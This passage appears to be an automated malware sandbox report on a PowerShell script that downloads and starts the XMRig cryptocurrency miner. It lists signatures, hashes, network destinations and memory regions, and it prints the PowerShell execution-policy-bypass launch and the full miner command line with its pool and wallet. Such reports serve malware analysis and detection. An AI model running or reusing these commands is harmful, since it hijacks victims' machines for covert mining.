| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4344-90-0x0000027212110000-0x0000027212130000-memory.dmp
memory/4344-91-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/1448-94-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-93-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/4344-92-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-95-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-96-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-97-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-98-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-99-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-100-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-101-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-102-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-103-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-104-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-105-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-106-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-107-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-108-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-109-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-110-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-111-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-112-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-113-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-114-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-115-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-116-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-117-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-118-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-119-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-120-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-121-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-122-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-123-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-124-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-125-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-126-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-127-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-128-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-129-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-130-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-131-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-132-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-133-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-134-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-135-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-136-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-137-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-138-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-139-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-140-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-141-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-142-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-143-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-144-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-145-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-146-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-147-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-148-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-149-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-150-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-151-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-152-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-153-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-154-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-155-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3104 wrote to memory of 652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3104 wrote to memory of 652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3104-4-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp
memory/3104-5-0x0000029A40270000-0x0000029A40292000-memory.dmp
memory/3104-6-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-10-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-9-0x0000029A40420000-0x0000029A40496000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rw2stgp0.spb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3104-25-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-48-0x0000029A408D0000-0x0000029A408E2000-memory.dmp
memory/3104-61-0x0000029A403E0000-0x0000029A403EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/652-90-0x0000026F9FBA0000-0x0000026F9FBC0000-memory.dmp
memory/652-91-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-92-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/3104-93-0x00007FFEBBF73000-0x00007FFEBBF74000-memory.dmp
memory/3104-94-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/3104-95-0x00007FFEBBF70000-0x00007FFEBC95C000-memory.dmp
memory/652-96-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-97-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-98-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-99-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-100-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-101-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-102-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-103-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-104-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-105-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-106-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-107-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-108-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-109-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-110-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-111-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-112-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-113-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-114-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-115-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-116-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-117-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-118-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-119-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-120-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-121-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-122-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-123-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-124-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-125-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-126-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-127-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-128-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-129-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-130-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-131-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-132-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-133-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-134-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-135-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-136-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-137-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-138-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-139-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-140-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-141-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-142-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-143-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-144-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-145-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-146-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-147-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-148-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-149-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-150-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-151-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-152-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-153-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-154-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-155-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
memory/652-156-0x00007FF6D9EB0000-0x00007FF6DAAE3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:49
Platform
win7-20240221-en
Max time kernel
1566s
Max time network
1573s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
Files
memory/2456-4-0x000007FEF632E000-0x000007FEF632F000-memory.dmp
memory/2456-5-0x000000001B370000-0x000000001B652000-memory.dmp
memory/2456-6-0x00000000022F0000-0x00000000022F8000-memory.dmp
memory/2456-7-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
memory/2456-8-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
memory/2456-9-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
memory/2456-10-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
memory/2456-11-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
memory/2456-12-0x000007FEF6070000-0x000007FEF6A0D000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:50
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1761s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3188 wrote to memory of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3188 wrote to memory of 4936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
memory/3188-0-0x00007FFF04D83000-0x00007FFF04D84000-memory.dmp
memory/3188-5-0x000001FDC55E0000-0x000001FDC5602000-memory.dmp
memory/3188-6-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/3188-9-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/3188-10-0x000001FDC58C0000-0x000001FDC5936000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vczwur0.rwc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3188-25-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/3188-48-0x000001FDC5690000-0x000001FDC56A2000-memory.dmp
memory/3188-61-0x000001FDAD280000-0x000001FDAD28A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4936-90-0x00000236BD720000-0x00000236BD740000-memory.dmp
memory/4936-91-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/3188-93-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/3188-92-0x00007FFF04D83000-0x00007FFF04D84000-memory.dmp
memory/4936-94-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/3188-95-0x00007FFF04D80000-0x00007FFF0576C000-memory.dmp
memory/4936-96-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-97-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-98-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-99-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-100-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-101-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-102-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-103-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-104-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-105-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-106-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-107-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-108-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-109-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-110-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-111-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-112-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-113-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-114-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
